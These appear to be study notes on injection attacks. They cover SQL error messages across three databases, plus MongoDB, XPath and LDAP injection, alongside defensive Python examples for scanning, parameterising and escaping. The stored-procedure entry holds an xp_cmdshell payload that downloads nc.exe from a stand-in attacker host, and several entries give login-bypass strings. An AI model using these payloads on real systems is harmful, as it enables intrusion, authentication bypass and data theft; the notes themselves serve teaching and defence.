MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''foo' at line X

Translation: For Oracle and MS-SQL, SQL injection is present, and it is almost certainly exploitable! If you entered a single quote and it altered the syntax of the Database query, this is the error you'd expect. For MySQL, SQL injection may be present, but the same error message can appear in other contexts.

*************************************************************************************

Q: - State error message related to parameters for Oracle, MSSQL and MySQL?

Oracle: PLS-00306: wrong number or types of arguments in call to 'XXX'

MSSQL: Procedure 'XXX' expects parameter '@YYY', which was not supplied

MySQL: Not Available

Translation: You have commented out or removed a variable that normally would be supplied to the
Database. In MS-SQL, you should be able to use time delay techniques to perform arbitrary data
retrieval.

*************************************************************************************

Q: - State error message related to UNION SELECT for Oracle, MSSQL and MySQL?

Oracle: ORA-01789: query block has incorrect number of result columns

MS-SQL: Msg 205, Level 16, State 1, Line 1

All queries in a SQL statement containing a UNION operator must have an equal number of expressions
in their target lists.

MySQL: The used SELECT statements have a different number of columns.

Translation: You will see this when you are attempting a UNION SELECT attack and you have specified a different number of columns from that found in the original SELECT statement. Try using a NULL, or using 1 or 2000.

*************************************************************************************
Q: - State error message related to UNION SELECT data type for Oracle, MSSQL and MySQL?

Oracle: ORA-01790: expression must have same datatype as corresponding expression

MS-SQL: Msg 245, Level 16, State 1, Line 1

Syntax error converting the varchar value ‘foo’ to a column of data type int.

MySQL: (MySQL will not give you an error.)

Translation: Your input doesn’t match the expected data type for the field. You may have SQL injection,
and you may not need a single quote, so try simply entering a number followed by your SQL to be
injected. In MS-SQL, you should be able to return any string value with this error message.

*************************************************************************************

Q: - How to tackle “From” keyword not found where expected for Oracle, MSSQL and MySQL?

Oracle: ORA-00923: FROM keyword not found where expected so we can use this query to tackle this
error in ORACLE (SELECT 1 from DUAL)

MSSQL: N/A

MySQL: N/A

Translation: The following will work in MS-SQL:

SELECT 1

But in Oracle, if you want to return something, you must select from a table. The DUAL table will do fine:

SELECT 1 from DUAL

*************************************************************************************

Q: - What error appears when the injection point occurs before the FROM keyword for Oracle, MSSQL and MySQL?

Oracle: ORA-00936: missing expression

MSSQL: Msg 156, Level 15, State 1, Line 1 Incorrect syntax near the keyword 'from'.

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ' XXX , YYY from SOME_TABLE' at line 1

Translation: You commonly see this error message when your injection point occurs before the FROM
keyword (for example, you have injected into the columns to be returned) and/or you have used the
comment character to remove required SQL keywords. Try completing the SQL statement yourself while
using your comment character. MySQL should helpfully reveal the column names XXX, YYY when this
condition is encountered.

*************************************************************************************

Q: - How to identify long string error for Oracle, MSSQL and MySQL?

Oracle: ORA-00972: identifier is too long

MSSQL: String or binary data would be truncated.

MySQL: N/A

Translation: This does not indicate SQL injection. You may see this error message if you have entered a
long string. You’re unlikely to get a buffer overflow here either, because the Database is handling your
input safely.

*************************************************************************************

Q: - What error will appear when we try to fetch a table or view that doesn't exist for Oracle, MSSQL
and MySQL?

Oracle: ORA-00942: table or view does not exist

MS-SQL: Msg 208, Level 16, State 1, Line 1 Invalid object name 'foo'

MySQL: Table 'DBNAME.SOMETABLE' doesn't exist

Translation: Either you are trying to access a table or view that does not exist, or, in the case of Oracle,
the Database user does not have privileges for the table or view. Test your query against a table you
know you have access to, such as DUAL. MySQL should helpfully reveal the current Database schema
DBNAME when this condition is encountered.

*************************************************************************************

Q: - How to identify grammar error for Oracle, MSSQL and MySQL?

Oracle: ORA-00920: invalid relational operator

MSSQL: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 1

Translation: You were probably altering something in a WHERE clause, and your SQL injection attempt
has disrupted the grammar.

*************************************************************************************

Q: - How to identify parenthesis error for Oracle, MSSQL and MySQL?

Oracle: ORA-00907: missing right parenthesis

MSSQL: N/A

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 1

Translation: Your SQL injection attempt has worked, but the injection point was inside parentheses. You
probably commented out the closing parenthesis with injected comment characters (--).

*************************************************************************************

Q: - How to identify general error for Oracle, MSSQL and MySQL?

Oracle: ORA-00900: invalid SQL statement

MS-SQL: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL
server version for the right syntax to use near XXXXXX

Translation: A general error message. The error messages listed previously all take precedence, so
something else went wrong. It’s likely you can try alternative input and get a more meaningful message.

*************************************************************************************

Q: - What does it mean by unimplemented feature for Oracle, MSSQL and MySQL?

Oracle: ORA-03001: unimplemented feature

MS-SQL: N/A

MySQL: N/A

Translation: You have tried to perform an action that Oracle does not allow. This can happen if you were
trying to display the Database version string from v$version but you were in an UPDATE or INSERT
query.

*************************************************************************************

Q: - How to catch SYSTEM VIEW error for Oracle, MSSQL and MySQL?

Oracle: ORA-02030: can only select from fixed tables/views

MS-SQL: N/A

MySQL: N/A

Translation: You were probably trying to edit a SYSTEM view. This can happen if you were trying to
display the Database version string from v$version but you were in an UPDATE or INSERT query.
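
The error strings quoted in the entries above are also useful on the defending side: an application that leaks them into its responses or logs is telling you that user input reached the SQL parser. The following scanner is an added example, not part of these notes, that turns those strings into signatures and runs them over a few constructed log lines (request paths and timestamps are invented; the error texts are the ones quoted above). The long-string errors are kept but flagged as non-indicative, matching the "Translation" for that entry.

```python
import re

# Signatures built from the error messages quoted in the Q&A entries above.
# Fields: (regex, dbms, indicative, meaning). "indicative" is False for the
# long-string errors, which the notes say do not point to SQL injection.
# More specific patterns come first because the first match wins.
ERROR_SIGNATURES = [
    (r"ORA-01790", "oracle", True, "UNION datatype mismatch"),
    (r"Msg 245,.*converting the varchar value", "mssql", True, "UNION datatype mismatch; string value echoed"),
    (r"ORA-00923", "oracle", True, "FROM keyword not found; Oracle needs a table such as DUAL"),
    (r"ORA-00936", "oracle", True, "injection point before FROM"),
    (r"Msg 156,.*near the keyword 'from'", "mssql", True, "injection point before FROM"),
    (r"right syntax to use near '[^']*\bfrom\b[^']*'", "mysql", True, "injection point before FROM; column names leaked"),
    (r"ORA-00972", "oracle", False, "identifier too long"),
    (r"String or binary data would be truncated", "mssql", False, "string too long"),
    (r"ORA-00942", "oracle", True, "table or view missing, or no privilege"),
    (r"Msg 208,.*Invalid object name", "mssql", True, "table or view missing"),
    (r"Table '[^']+' doesn't exist", "mysql", True, "table missing; schema name leaked"),
    (r"ORA-00920", "oracle", True, "grammar disrupted in WHERE clause"),
    (r"ORA-00907", "oracle", True, "closing parenthesis commented out"),
    (r"ORA-03001", "oracle", True, "unimplemented feature"),
    (r"ORA-02030", "oracle", True, "attempt to modify a SYSTEM view"),
    (r"Msg 170,.*Incorrect syntax near", "mssql", True, "general syntax error"),
    (r"ORA-00900", "oracle", True, "invalid SQL statement"),
    (r"You have an error in your SQL syntax", "mysql", True, "general syntax error"),
]


def classify_db_error(text):
    """Return (dbms, indicative, meaning) for the first matching signature, else None."""
    for pattern, dbms, indicative, meaning in ERROR_SIGNATURES:
        if re.search(pattern, text, re.IGNORECASE | re.DOTALL):
            return dbms, indicative, meaning
    return None


def scan_log(lines):
    """Walk application log lines and report every leaked database error.

    Returns a list of (line_number, dbms, indicative, meaning). Entries with
    indicative=True mean user input reached the SQL parser and deserve follow-up.
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        hit = classify_db_error(line)
        if hit is not None:
            findings.append((number, *hit))
    return findings


# Constructed sample log: an application that echoes database errors into its
# own log. Request details are invented; the error texts are the ones quoted above.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z GET /search?q=1 200",
    "2024-05-01T10:00:02Z GET /search?q=1' 500 ORA-01790: expression must have same datatype as corresponding expression",
    "2024-05-01T10:00:04Z GET /item?id=1 500 Msg 245, Level 16, State 1, Line 1 Syntax error converting the varchar value 'foo' to a column of data type int.",
    "2024-05-01T10:00:06Z POST /profile 500 ORA-00972: identifier is too long",
    "2024-05-01T10:00:08Z GET /report 500 Table 'DBNAME.SOMETABLE' doesn't exist",
    "2024-05-01T10:00:10Z POST /profile 500 String or binary data would be truncated.",
    "2024-05-01T10:00:12Z GET /list 500 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ' XXX , YYY from SOME_TABLE' at line 1",
]

if __name__ == "__main__":
    for number, dbms, indicative, meaning in scan_log(SAMPLE_LOG):
        flag = "INJECTION INDICATOR" if indicative else "benign"
        print(f"line {number}: {dbms:7s} {flag:20s} {meaning}")
```

The same signatures can be pointed at HTTP response bodies instead of log lines; wherever they fire, the fix is the same on the application side: stop returning raw database errors to the client and parameterise the query that produced them.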

*************************************************************************************

Q: - How could a database stored procedure be vulnerable?

Even if a robust stored procedure is being used, SQL injection vulnerabilities can arise if it is invoked in
an unsafe way using user-supplied input. For example, suppose that a user registration function is
implemented within a stored procedure, which is invoked as follows:

exec sp_RegisterUser 'joe', 'secret'

This statement may be just as vulnerable as a simple INSERT statement. For example, an attacker may
supply the following password:

foo'; exec master..xp_cmdshell 'tftp wahh-attacker.com GET nc.exe'--

which causes the application to perform the following batch query:

exec sp_RegisterUser 'joe', 'foo'; exec master..xp_cmdshell 'tftp wahh-attacker.com GET nc.exe'--'

Therefore, the use of the stored procedure has achieved nothing.
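
The weakness is in how the procedure is invoked, not in the procedure itself, so the fix is to bind the values as parameters instead of splicing them into the EXEC text. The following is an added example, not from these notes: it builds the concatenated batch from the entry above as text (never executed) and, beside it, stores the same password through a bound parameter. SQLite has no stored procedures, so an INSERT into an assumed users table stands in for the sp_RegisterUser call; with pyodbc against MS-SQL the equivalent call is cursor.execute("EXEC sp_RegisterUser ?, ?", (username, password)).

```python
import sqlite3

# Assumed table standing in for whatever sp_RegisterUser writes to.
SCHEMA = "CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)"


def build_unsafe_batch(username, password):
    """Vulnerable pattern from the notes: the caller splices raw input into the
    EXEC text, so a quote in the password ends the literal and the rest of the
    input becomes further statements. Returned as text only; nothing is executed."""
    return f"exec sp_RegisterUser '{username}', '{password}'"


def register_user_safe(conn, username, password):
    """Safe pattern: values are bound as parameters, so the database receives
    them as data and never parses them as SQL. SQLite has no stored procedures,
    so an INSERT stands in for the procedure call."""
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    conn.commit()


def demo():
    """Register a user whose password is the injection string quoted in the notes
    and show that binding stores it verbatim as a single row."""
    payload = "foo'; exec master..xp_cmdshell 'tftp wahh-attacker.com GET nc.exe'--"
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    register_user_safe(conn, "joe", payload)
    rows = conn.execute("SELECT username, password FROM users").fetchall()
    conn.close()
    return build_unsafe_batch("joe", payload), rows


if __name__ == "__main__":
    batch, rows = demo()
    print("text a concatenating caller would send:", batch)
    print("rows stored by the parameterised call: ", rows)
```

The parameterised path leaves exactly one row, with the quote and the semicolon sitting inside the stored password; the concatenated text is the batch shown in the entry above, with the trailing quote left dangling after the comment.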

*************************************************************************************

Q: - How to comment out the remaining code in MongoDB?

In JavaScript, a double forward slash (//) signifies a rest-of-line comment, so the remaining code in the
function is commented out.

for example:

function() { return this.username == 'Marcus'//' & this.password == 'aaa'; }

*************************************************************************************

Q: - What is the alternative way to check whether JavaScript code is returning a true value or not in
MongoDB code?

An alternative means of ensuring that the $js function always returns true, without using a comment,
would be to supply a username of:

a' || 1==1 || 'a'=='a


JavaScript interprets the various operators like this:

(this.username == 'a' || 1==1) || ('a'=='a' & this.password == 'aaa');

This results in all of the resources in the user collection being matched, since the first disjunctive
condition is always true (1 is always equal to 1).
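
Both MongoDB entries above depend on the application assembling a $where JavaScript function by string concatenation. The following is an added example, not from these notes, that reproduces that concatenation as text only (the function shape, including its single &, is taken from the entry above) and contrasts it with the safe form: a plain query document, which the driver sends as BSON strings rather than as code. A small in-memory list with constructed users stands in for the collection, and find_users is a minimal equality-only stand-in for collection.find.

```python
# Constructed stand-in for a MongoDB "users" collection.
USERS = [
    {"username": "Marcus", "password": "aaa"},
    {"username": "alice", "password": "s3cret"},
]


def build_where_clause(username, password):
    """Vulnerable pattern: the $where JavaScript is assembled by concatenation
    (shape taken from the function quoted in the notes, single & included).
    Returned as text only; no JavaScript is evaluated here."""
    return ("function() { return this.username == '" + username
            + "' & this.password == '" + password + "'; }")


def build_equality_filter(username, password):
    """Safe pattern: a plain query document. The driver encodes the values as
    BSON strings, so quotes, // and || inside them are just characters."""
    return {"username": username, "password": password}


def find_users(collection, query):
    """Minimal in-memory stand-in for collection.find(query): exact equality on
    every key in the query document."""
    return [doc for doc in collection
            if all(doc.get(key) == value for key, value in query.items())]


def login_matches(username, password, collection=USERS):
    """Number of documents the safe filter matches for the given credentials."""
    return len(find_users(collection, build_equality_filter(username, password)))


if __name__ == "__main__":
    for user, pw in [("Marcus", "aaa"), ("Marcus'//", "x"), ("a' || 1==1 || 'a'=='a", "x")]:
        print(repr(user), "->", login_matches(user, pw), "match(es);",
              "unsafe $where would be:", build_where_clause(user, pw))
```

With the equality document, the two usernames from the entries above match zero documents because no stored username contains a quote or a comment marker; only the genuine credentials match one. The concatenated text for "Marcus'//" is exactly the function shown in the previous entry.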

*************************************************************************************

Q: - How to subvert logic of XPath to get data?

<addressBook>

<address>

<firstName>William</firstName>

<surname>Gates</surname>

<password>MSRocks!</password>

<email>[email protected]</email>

<ccard>5130 8190 3282 3515</ccard>

</address>

<address>

<firstName>Chris</firstName>

<surname>Dawes</surname>

<password>secret</password>

<email>[email protected]</email>

<ccard>3981 2491 3242 3121</ccard>

</address>

</addressBook>

now we will get all email addresses like this:


//address/email/text()

A query to return all the details of the user Dawes would look like this:

//address[surname/text()='Dawes']

The following XPath query effectively verifies the user-supplied credentials and retrieves the relevant
user’s credit card number:

//address[surname/text()='Dawes' and password/text()='secret']/ccard/text()

In this case, an attacker may be able to subvert the application's query in an identical way to a SQL
injection flaw. For example, supplying a password with this value:

' or 'a'='a

results in the following XPath query, which retrieves the credit card details of all users:

//address[surname/text()='Dawes' and password/text()='' or 'a'='a']/ccard/text()

Note: the leading // selects matching nodes anywhere in the document below the current node, regardless
of where they sit in the tree.
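
The injected query above works because the password is spliced into a single-quoted XPath literal, and a quote in the value ends that literal. The following is an added example, not from these notes, using the addressBook document above as its sample input (e-mail addresses are placeholders, since the copy above shows them redacted). It reproduces the concatenated query as text only and, beside it, a lookup that rejects quote characters before the expression is built and then uses ElementTree's exact-match [tag='text'] predicate, with chained predicates acting as AND.

```python
import xml.etree.ElementTree as ET

# The addressBook document from the notes, embedded here as the sample input.
# E-mail addresses are placeholders.
ADDRESS_BOOK = """<addressBook>
<address>
<firstName>William</firstName><surname>Gates</surname><password>MSRocks!</password>
<email>gates@example.com</email><ccard>5130 8190 3282 3515</ccard>
</address>
<address>
<firstName>Chris</firstName><surname>Dawes</surname><password>secret</password>
<email>dawes@example.com</email><ccard>3981 2491 3242 3121</ccard>
</address>
</addressBook>"""


def load_address_book():
    return ET.fromstring(ADDRESS_BOOK)


def build_unsafe_xpath(surname, password):
    """Vulnerable pattern from the notes: credentials spliced into the XPath text.
    Returned as text only; it is never evaluated here."""
    return ("//address[surname/text()='" + surname + "' and password/text()='"
            + password + "']/ccard/text()")


def lookup_ccard(root, surname, password):
    """Safe lookup. The only way a value can escape a single-quoted XPath literal
    is with a quote character, so inputs containing one are rejected before the
    expression is built. ElementTree's [tag='text'] predicate is an exact match on
    the child's text, and chained predicates act as AND."""
    for value in (surname, password):
        if "'" in value or '"' in value:
            raise ValueError("quote characters are not allowed in credentials")
    matches = root.findall(f".//address[surname='{surname}'][password='{password}']")
    return [m.findtext("ccard") for m in matches]


def demo():
    """Run the genuine credentials, a wrong password and the payload from the notes."""
    root = load_address_book()
    payload = "' or 'a'='a"
    try:
        lookup_ccard(root, "Dawes", payload)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "valid": lookup_ccard(root, "Dawes", "secret"),
        "wrong_password": lookup_ccard(root, "Dawes", "wrong"),
        "payload_rejected": rejected,
        "unsafe_query_for_payload": build_unsafe_xpath("Dawes", payload),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Rejecting quotes is the narrowest fix that keeps the query in XPath; where the XPath engine supports variable binding, passing the credentials as variables is the more general answer, because the value then never touches the expression text at all.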

*************************************************************************************

Q: - What is LDAP and what types of LDAP filter are there?

The Lightweight Directory Access Protocol (LDAP) is used to access directory services over a network.
Types of LDAP search filter:

1- Simple match conditions:

Match on the value of a single attribute. For example, an application function that searches for a user via
his username might use this filter:

(username=daf)

2- Disjunctive queries:

Specify multiple conditions, any one of which must be satisfied by entries that are returned. For
example, a search function that looks up a user-supplied search term in several directory attributes
might use this filter:

(|(cn=searchterm)(sn=searchterm)(ou=searchterm))

3- Conjunctive queries:

Specify multiple conditions, all of which must be satisfied by entries that are returned. For example, a
login mechanism implemented in LDAP might use this filter:

(&(username=daf)(password=secret))
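
The three filter types above are each built around user-supplied values, so the practical question is how to put a value into a filter without it becoming filter syntax. The following is an added example, not from these notes: it builds each of the three filters shown above from its inputs and escapes the values first using the RFC 4515 rules for assertion values (backslash, asterisk, parentheses and NUL become backslash plus two hex digits). python-ldap ships the same escaping as ldap.filter.escape_filter_chars; the copy here keeps the example dependency-free.

```python
# Escape table for assertion values in search filters (RFC 4515, section 3).
# Each metacharacter becomes a backslash followed by its two hex digits.
_LDAP_ESCAPES = {
    "\\": "\\5c",
    "*": "\\2a",
    "(": "\\28",
    ")": "\\29",
    "\x00": "\\00",
}


def ldap_escape(value):
    """Escape a user-supplied value so it can only ever be an attribute value,
    never additional filter syntax. Mapping each character independently means
    the backslash is handled in the same pass as the characters it escapes."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def simple_filter(attribute, value):
    """Type 1 from the notes: match on the value of a single attribute."""
    return f"({attribute}={ldap_escape(value)})"


def disjunctive_filter(attributes, term):
    """Type 2: any one of several attributes may match the search term."""
    return "(|" + "".join(simple_filter(a, term) for a in attributes) + ")"


def conjunctive_filter(username, password):
    """Type 3: the login check, where both conditions must hold."""
    return "(&" + simple_filter("username", username) + simple_filter("password", password) + ")"


if __name__ == "__main__":
    print(simple_filter("username", "daf"))
    print(disjunctive_filter(["cn", "sn", "ou"], "searchterm"))
    print(conjunctive_filter("daf", "secret"))
    # A constructed value containing filter metacharacters stays a plain value:
    print(disjunctive_filter(["cn", "sn"], "O'Brien (admin)*"))
```

For ordinary values the output is exactly the three filters listed above; for a value containing parentheses or an asterisk the directory server still sees one assertion value, with those characters encoded, rather than extra filter terms.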
